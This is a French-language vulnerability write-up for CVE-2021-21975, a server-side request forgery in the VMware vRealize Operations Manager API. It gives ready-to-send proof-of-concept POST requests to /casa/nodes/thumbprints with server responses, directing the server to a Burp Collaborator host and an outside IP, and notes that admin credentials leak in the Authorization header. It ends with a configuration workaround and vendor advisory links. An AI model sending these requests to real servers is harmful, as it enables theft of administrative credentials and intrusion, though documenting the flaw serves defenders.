
[CVE-2021-21975] Falsification de requête côté serveur (SSRF) de l'API Server de VMware vRealize Operations Manager
[CVE-2021-21975] VMware vRealize Operations Manager API Falsification de requête côté serveur (SSRF)
vRealize Operations (vROps) est un outil de gestion des opérations IT autonome piloté par l'IA, des applications à l'infrastructure, pour optimiser, planifier et étendre les déploiements VMware Cloud et HCI tout en unifiant la surveillance du cloud public. L'API VMware vRealize Operations Manager 8.4 et toutes les versions précédentes est vulnérable à une falsification de requête côté serveur (SSRF). L'exploitation réussie de cette vulnérabilité peut permettre de lire ou de mettre à jour des ressources internes et, dans ce cas, un attaquant peut facilement voler les identifiants administratifs du serveur vROps. En combinant CVE-2021-21975 et CVE-2021-21983, un attaquant peut exécuter du code arbitraire sur le serveur vRealize Operations distant.
Preuve de concept (PoC) : Pour exploiter cette vulnérabilité, vous pouvez utiliser la requête suivante
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close
[
"h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]
La réponse à la requête ci-dessus est ci-dessous
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151
[
{
"address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
"thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
}
]
De plus, les identifiants administratifs sont divulgués dans l'en-tête Authorization.
Autres preuves de concept (PoC) : Ou vous pouvez utiliser les requêtes suivantes pour détecter la vulnérabilité CVE-2021-21975 VMware vRealize Operations Manager API Falsification de requête côté serveur (SSRF)
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close
[
"78.171.203.41:8000/CVE-2021-21975"
]
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67
[
{
"address":"78.171.203.41:8000/CVE-2021-21975",
"thumbprint":null
}
]
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close
[
"78.171.203.41:8000"
]
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52
[
{
"address":"78.171.203.41:8000",
"thumbprint":null
}
]
Solution de contournement : Si le correctif ne peut pas être installé, ou s'il n'y a pas de correctif pour votre version de vRealize Operations, les étapes suivantes peuvent être suivies pour contourner le problème. L'application de ce contournement n'a aucun impact sur vRealize Operations.
Pour contourner ce problème dans vRealize Operations, supprimez une ligne de configuration de casa-security-context.xml
/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml<sec:http pattern="/nodes/thumbprints" security='none'/>service vmware-casa restartPour plus d'informations, visitez les pages suivantes.
https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html